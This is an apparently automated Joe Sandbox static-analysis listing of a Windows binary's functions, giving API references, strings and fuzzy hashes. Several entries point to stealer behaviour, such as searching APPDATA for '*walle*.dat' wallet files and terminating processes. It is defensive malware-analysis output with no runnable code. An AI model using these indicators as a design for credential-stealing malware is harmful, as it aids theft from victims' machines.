Instruction ID: 7061a34ca376d328e90b831a04dd37cafdd4b3852351ba3d1f892d7eb04df8c2
Opcode Fuzzy Hash: f85d47aaeb65c75eb06d376a0ab9dd4d5e319b6246058adae964f0e85ec8a212
Instruction Fuzzy Hash: 66024571D00249AFCF11CFE8C981AEDBBB5FF09304F04806AE915AB262D7799A58CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00440FCB Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 219COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 00441076
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004410B0
__allrem.LIBCMT ref: 00441177

Strings

statement aborts at %d: [%s] %s, xrefs: 00441386

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: __allrem$Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: statement aborts at %d: [%s] %s
API String ID: 2560231902-2689542837
Opcode ID: c92e9049ab04cc5ef13b19bd37018368a7bcda8e7c6fa7386211ecce8fa5a5be
Instruction ID: eeff5df891d3ead240e75fb14a66200672f32ace87764de4931739d083d4a48d
Opcode Fuzzy Hash: c92e9049ab04cc5ef13b19bd37018368a7bcda8e7c6fa7386211ecce8fa5a5be
Instruction Fuzzy Hash: 3C817971D00658DBEF289FA5D9806EDBBB0FF08314F14412FE956A76A1DB385C86CB08

Uniqueness

Uniqueness Score: -1.00%

Function 00448E4F Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 135COMMON

Download Yara Rule

APIs

Part of subcall function 0042133E: _memset.LIBCMT ref: 00421358

_memmove.LIBCMT ref: 00448F37

Strings

Cannot add a column to a view, xrefs: 00448E9C
sqlite_altertab_%s, xrefs: 00448F08
virtual tables may not be altered, xrefs: 00448E8F

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: _memmove_memset
String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
API String ID: 3555123492-2063813899
Opcode ID: 7b542a8f42a4e36109eb17806625c477164fc8c12666891da2d119f36e25a0e9
Instruction ID: d3d709d9f7268320341e92c9232df9b35c4f8feef72115bbaa0471e2651927ed
Opcode Fuzzy Hash: 7b542a8f42a4e36109eb17806625c477164fc8c12666891da2d119f36e25a0e9
Instruction Fuzzy Hash: 99518E75A00215EFDB10DF69C881A5DB7F1FF48710F24856AE848DB751DB38EA51CB88

Uniqueness

Uniqueness Score: -1.00%

Function 004055F5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00405614
__wgetenv.LIBCMT ref: 0040561E

Strings

APPDATA, xrefs: 00405619
*walle*.dat, xrefs: 00405681

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: H_prolog3__wgetenv
String ID: *walle*.dat$APPDATA
API String ID: 2103180621-3606306028
Opcode ID: ef23d4bc288f59019cf4ac9f05a88af584c45c051f73f1b0b2b3265cb5dd3745
Instruction ID: 3019887d5c689e71e105052518c9219dd5f653affb3e99a2212165fd8390414f
Opcode Fuzzy Hash: ef23d4bc288f59019cf4ac9f05a88af584c45c051f73f1b0b2b3265cb5dd3745
Instruction Fuzzy Hash: B6411771500148AFCB15EF64DD55AEF7BA8EF15304F50407FF84AAB292DA389A09CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00402773 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 00402792
std::exception::exception.LIBCMT ref: 004027B4

Strings

LXG, xrefs: 004027AD, 004027B0
DXG, xrefs: 004027CB, 00402791

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID: DXG$LXG
API String ID: 3728558374-3945582453
Opcode ID: a4c6996a1fe38af06a98789dac4c3ff042d06f8201d414351fc9669c778e6c0c
Instruction ID: e0f046ce1b0a9fbe73596cc9bf26ecd8ee2fedd6269c93b083a20fb6cbbff913
Opcode Fuzzy Hash: a4c6996a1fe38af06a98789dac4c3ff042d06f8201d414351fc9669c778e6c0c
Instruction Fuzzy Hash: 8A01B9718043089BCB40FF65D50A6AE77E49B04319F64C43BAD05BB282D7BCCA05CF99

Uniqueness

Uniqueness Score: -1.00%

Function 0045048F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?), ref: 004504A1
IsWow64Process.KERNEL32(00000000), ref: 004504A8

Strings

x86, xrefs: 004504BE
x64, xrefs: 004504B7

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: Process$CurrentWow64
String ID: x64$x86
API String ID: 1905925150-1778291495
Opcode ID: e86f37e5e68d8ba3af4ede798a2739abb8435ec8458eb90a4089460ff22fe624
Instruction ID: ed0eece759eba5e13d56ce6d9a2271826038babef3de06f565986b7c6c0414dd
Opcode Fuzzy Hash: e86f37e5e68d8ba3af4ede798a2739abb8435ec8458eb90a4089460ff22fe624
Instruction Fuzzy Hash: 96F0E275600308EFCB109FA5DD489AABBA8FB05341B10857FE645D3201C3789E84C764

Uniqueness

Uniqueness Score: -1.00%

Function 00428D9D Relevance: 6.2, APIs: 4, Instructions: 194COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00428E3F
_memmove.LIBCMT ref: 00428E7C
_memset.LIBCMT ref: 00428E8D
_memmove.LIBCMT ref: 00428ECC

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: _memmove$_memset
String ID:
API String ID: 1357608183-0
Opcode ID: 5835e50d573e4d23bf9d916e8cb02bc919e3ce6fb74e9197cf368ecf5fed03e4
Instruction ID: 3026e31c48ea6e3f583d9eb1ef23d995e9eb0de170042258cda16e3910df9c5b
Opcode Fuzzy Hash: 5835e50d573e4d23bf9d916e8cb02bc919e3ce6fb74e9197cf368ecf5fed03e4
Instruction Fuzzy Hash: 1B61D372A01225ABDF00DF64DC41BAFB775FF48304F45802AF909AB281EB389D50CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0045C1B9 Relevance: 6.2, APIs: 4, Instructions: 173COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0045C1C7

Part of subcall function 00459CC7: __getptd.LIBCMT ref: 00459CDA

Part of subcall function 0045E9AD: __getptd_noexit.LIBCMT ref: 0045E9AD

__stricmp_l.LIBCMT ref: 0045C234

Part of subcall function 00466E88: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00466E97

___crtLCMapStringA.LIBCMT ref: 0045C28A
___crtLCMapStringA.LIBCMT ref: 0045C30B

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: Locale$StringUpdateUpdate::____crt$__getptd__getptd_noexit__stricmp_l
String ID:
API String ID: 2544346105-0
Opcode ID: 8379f7b4d90bd453207e357675c4ef0be838b7bd9137ddc1c87285b76d5f93fb
Instruction ID: 29d34207993d005e88a29c666e7cdc6f5d9f08c3c93945163e0bb4c384dfa8d0
Opcode Fuzzy Hash: 8379f7b4d90bd453207e357675c4ef0be838b7bd9137ddc1c87285b76d5f93fb
Instruction Fuzzy Hash: 60512870C04349AFDB2587A4C4C5BBE7BB0AB4131AF2881DBEC615A1D3C278894AD755

Uniqueness

Uniqueness Score: -1.00%

Function 004341F2 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29983188293984ac0b3f30d414619ab12d7c3a4332b05281a9d61b2552c524eb
Instruction ID: 69e9789b958167b93022658586695e7d340ba19c9921724b95a48efe8b970167
Opcode Fuzzy Hash: 29983188293984ac0b3f30d414619ab12d7c3a4332b05281a9d61b2552c524eb
Instruction Fuzzy Hash: 30515871600705EFEB64DF24C985AAB7BE9FB88344F10942AF8429BA50E734F950CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0045AC0E Relevance: 6.1, APIs: 4, Instructions: 130COMMONLIBRARYCODE

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0045ACA9
__flush.LIBCMT ref: 0045ACC7
__write.LIBCMT ref: 0045ACEE
__flsbuf.LIBCMT ref: 0045AD19

Part of subcall function 0045E9AD: __getptd_noexit.LIBCMT ref: 0045E9AD

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 559385d203f8b5f07d02a2e9d65b78f0d0f4e91b4d69c54cf43a4854d1014ec1
Instruction ID: 71db557098c35d6b8d85e6abb0a3139a39d924a60d727ef496fb94a10d733abf
Opcode Fuzzy Hash: 559385d203f8b5f07d02a2e9d65b78f0d0f4e91b4d69c54cf43a4854d1014ec1
Instruction Fuzzy Hash: DE412631A006049BDF26DF65C84069FB7B2AF80312F24872FEC1187652D778DD6D8B5A

Uniqueness

Uniqueness Score: -1.00%

Function 0046C706 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0046C73A
__isleadbyte_l.LIBCMT ref: 0046C76D
MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,00000000,00000000,?,?,?,?,?,00000000), ref: 0046C79E
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,00000000,00000000,?,?,?,?,?,00000000), ref: 0046C80C

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: bd8f383c738ef370a1130f1d00cd6be8fd2dca3162bae5550b79d507be1fff77
Instruction ID: 6b079fe85798e99465c87cf4a16d3d6bdd327b3329d00ec4298a6156cc6bb0cc
Opcode Fuzzy Hash: bd8f383c738ef370a1130f1d00cd6be8fd2dca3162bae5550b79d507be1fff77
Instruction Fuzzy Hash: B131B235A10286EFDB10DF64C8C09BA3BA5BF01312F14856BE4A59B291F734DD41DF9A

Uniqueness

Uniqueness Score: -1.00%

Function 004552BA Relevance: 6.1, APIs: 4, Instructions: 100timeCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0045530A
SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0045533A
GetLocalTime.KERNEL32(?), ref: 00455367
SystemTimeToFileTime.KERNEL32(?,?), ref: 00455375

Part of subcall function 00454DE4: GetFileInformationByHandle.KERNEL32(?,?), ref: 00454E19

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: File$Time$Pointer$HandleInformationLocalSystem
String ID:
API String ID: 3986731826-0
Opcode ID: 8676907d4c8fb5c07fb2f479534bf375cf89462a461d1b06cc128f3ce7aa9ae0
Instruction ID: a4eee25e75a4ccdba168d409244f9bef3a787231784a0897c4169dccfbf274f3
Opcode Fuzzy Hash: 8676907d4c8fb5c07fb2f479534bf375cf89462a461d1b06cc128f3ce7aa9ae0
Instruction Fuzzy Hash: E93151B1900B489FC721DF69C8849BFBBF8FB48304B00492FE996D2651D774E948CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00451417 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 0045142E
_malloc.LIBCMT ref: 00451441
_free.LIBCMT ref: 004514C3

Part of subcall function 004596AA: HeapFree.KERNEL32(00000000,00000000,?,0045EE33,00000000,?,?,00457E26,00000001,00000000,?,?,?,00457E84,004010F0), ref: 004596C0
Part of subcall function 004596AA: GetLastError.KERNEL32(00000000,?,0045EE33,00000000,?,?,00457E26,00000001,00000000,?,?,?,00457E84,004010F0), ref: 004596D2

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: EncodersErrorFreeGdipHeapImageLastSize_free_malloc
String ID:
API String ID: 34177290-0
Opcode ID: 9b8c855e31308abd8f97e2123c2721a54ca87dd2d7eaaf8f5b264cd10513e438
Instruction ID: e94f358c3e948be61b48840d05a4398150b7f98e94455c1225d64b262ce0ecb3
Opcode Fuzzy Hash: 9b8c855e31308abd8f97e2123c2721a54ca87dd2d7eaaf8f5b264cd10513e438
Instruction Fuzzy Hash: E621D736C00418EBCF10DF64C8409AEBB76EF16775B215257EC11672A2D7369E49CB84

Uniqueness

Uniqueness Score: -1.00%

Function 00466D59 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00466D7F

Part of subcall function 00466BAB: __fltout2.LIBCMT ref: 00466BD6

__cftog_l.LIBCMT ref: 00466DA5
__cftoe_l.LIBCMT ref: 00466DD7

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: 1415a8b057b472ce4a924f220df0773d9fc0ab398f26307a6a190f37f0d6a17c
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: 4611437210014DBBCF126E85CC45CEE3F36BB58354F5A8416FE2859135E23BC971AB86

Uniqueness

Uniqueness Score: -1.00%

Function 00415C62 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,76C85970,?,00415D8B,?), ref: 00415C80
_malloc.LIBCMT ref: 00415C87

Part of subcall function 0045A16B: __FF_MSGBANNER.LIBCMT ref: 0045A184
Part of subcall function 0045A16B: __NMSG_WRITE.LIBCMT ref: 0045A18B
Part of subcall function 0045A16B: RtlAllocateHeap.NTDLL(00000000,00000001,?,00000001,?,?,00457E26,00000001,00000000,?,?,?,00457E84,004010F0), ref: 0045A1B0

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,76C85970,?,00415D8B,?), ref: 00415CA6
_free.LIBCMT ref: 00415CAD

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeap_free_malloc
String ID:
API String ID: 2079281532-0
Opcode ID: 4724accdff759e7cc95310b1e6e3fddde50d73afba8eabae58128ca61bc00db3
Instruction ID: 2e86a96c45c5800e54e45e25aee88dbd3f5feade7cec364f4aeab1288c6bfe34
Opcode Fuzzy Hash: 4724accdff759e7cc95310b1e6e3fddde50d73afba8eabae58128ca61bc00db3
Instruction Fuzzy Hash: 0BF0E2B220E21DBEA6002EB55CC0C7B7B9CD7C66FCF20032FF91492181F9268C451AB9

Uniqueness

Uniqueness Score: -1.00%

Function 0046625C Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(00000000,004648E4,00000000,00000000,76C85970,?,0045ABA9,?,00000000,?,?,?,?,?,?,00000000), ref: 0046625F
__malloc_crt.LIBCMT ref: 0046628E
FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,00000000,?,0045ABA9,?,00000000,?,?,?,?,?,?,00000000,00411D33), ref: 0046629B

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: EnvironmentStrings$Free__malloc_crt
String ID:
API String ID: 237123855-0
Opcode ID: 052f1359120af391ec05110ecefe464810d6501feae0217cb281e31831a2db45
Instruction ID: 78a76ec25a242bcd063ddb46a0260e721b986cc416daef6d08026aa70d59e8cd
Opcode Fuzzy Hash: 052f1359120af391ec05110ecefe464810d6501feae0217cb281e31831a2db45
Instruction Fuzzy Hash: DFF0A77B9041106A8F317B36BC99CA76B78DAD536531B44ABF805C3305FA288DC583AB

Uniqueness

Uniqueness Score: -1.00%

Function 00415C12 Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,00000000,?,?,004162CE,?,00000000,004163BF,?), ref: 00415C2D
_malloc.LIBCMT ref: 00415C35

Part of subcall function 0045A16B: __FF_MSGBANNER.LIBCMT ref: 0045A184
Part of subcall function 0045A16B: __NMSG_WRITE.LIBCMT ref: 0045A18B
Part of subcall function 0045A16B: RtlAllocateHeap.NTDLL(00000000,00000001,?,00000001,?,?,00457E26,00000001,00000000,?,?,?,00457E84,004010F0), ref: 0045A1B0

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,00000000,?,?,004162CE,?,00000000,004163BF,?), ref: 00415C4C
_free.LIBCMT ref: 00415C53

Part of subcall function 004596AA: HeapFree.KERNEL32(00000000,00000000,?,0045EE33,00000000,?,?,00457E26,00000001,00000000,?,?,?,00457E84,004010F0), ref: 004596C0
Part of subcall function 004596AA: GetLastError.KERNEL32(00000000,?,0045EE33,00000000,?,?,00457E26,00000001,00000000,?,?,?,00457E84,004010F0), ref: 004596D2

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: ByteCharHeapMultiWide$AllocateErrorFreeLast_free_malloc
String ID:
API String ID: 1203951092-0
Opcode ID: 10ee486cf2281d92c9226927189fed275fc57e77dfd148257cdca5777612c45d
Instruction ID: 99103d06460c5dbfe3e9fefd67c158072b8a8dc674a4edce13811d5e4a5814e2
Opcode Fuzzy Hash: 10ee486cf2281d92c9226927189fed275fc57e77dfd148257cdca5777612c45d
Instruction Fuzzy Hash: 5DF0A07620871EBBD61029E99C40D77778CEB86279F20072BFE11E22C2EE599C0006B8

Uniqueness

Uniqueness Score: -1.00%

Function 0040A2C3 Relevance: 6.0, APIs: 4, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 0040A1D5: _malloc.LIBCMT ref: 0040A202
Part of subcall function 0040A1D5: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040A215
Part of subcall function 0040A1D5: CloseHandle.KERNEL32(00000000,?,00000001,00000000), ref: 0040A222

OpenProcess.KERNEL32(001FFFFF,00000000,00000000,?,?,?,00000001,00000000,?,00413EF8,?,00000224,00406897,00000001,00000000,00000000), ref: 0040A2E8
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000001,00000000,?,00413EF8,?,00000224,00406897,00000001,00000000,00000000,00000000), ref: 0040A2F8
CloseHandle.KERNEL32(00000000,?,?,?,00000001,00000000,?,00413EF8,?,00000224,00406897,00000001,00000000,00000000,00000000,00000000), ref: 0040A2FF
_free.LIBCMT ref: 0040A30D

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: CloseHandleProcess$CreateOpenSnapshotTerminateToolhelp32_free_malloc
String ID:
API String ID: 486718275-0
Opcode ID: a17206efaa1c59b824489f92e0882382d7f92e586b40c9cb7c6fa39cfdf4ece1
Instruction ID: fdb09040cfb64e80b198c15cb5fba406b8a2c7193b492424cd3b8be956be7afd
Opcode Fuzzy Hash: a17206efaa1c59b824489f92e0882382d7f92e586b40c9cb7c6fa39cfdf4ece1
Instruction Fuzzy Hash: 24F0E933100218BBC7112BA4DC89EAF7B2CDB85774F100137FD15961D1C73558D296A9

Uniqueness

Uniqueness Score: -1.00%

Function 004515F5 Relevance: 6.0, APIs: 4, Instructions: 34fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00451610
GetFileSizeEx.KERNEL32(00000000,?), ref: 00451628
CloseHandle.KERNEL32(00000000), ref: 00451633
CloseHandle.KERNEL32(00000000), ref: 0045163B

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: CloseFileHandle$CreateSize
String ID:
API String ID: 4148174661-0
Opcode ID: 556ced8c1e7d5b334c9ece2979d866b478421877a1eaafcb48ee0e93d5b190dc
Instruction ID: 9121ed80394346c18e55a5776d7989e5d15badc89a77dbc448e695e72b83ccad
Opcode Fuzzy Hash: 556ced8c1e7d5b334c9ece2979d866b478421877a1eaafcb48ee0e93d5b190dc
Instruction Fuzzy Hash: 2AF08931540214FBD710A760DC0DFAF3A68EB55751F104221FD01A21D0D7705A8585A9

Uniqueness

Uniqueness Score: -1.00%

Function 004518D9 Relevance: 6.0, APIs: 4, Instructions: 33memoryCOMMON

Download Yara Rule

APIs

numpunct.LIBCPMT ref: 004518DC
__CxxThrowException@8.LIBCMT ref: 004518E5

Part of subcall function 00458701: RaiseException.KERNEL32(?,?,00401105,?,?,?,?,?,00401105,?,00483420,00000000), ref: 00458743

GdipCloneImage.GDIPLUS(00000000,00000000), ref: 004518FD
GdipAlloc.GDIPLUS(00000010,00000000,00000000), ref: 0045190B

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
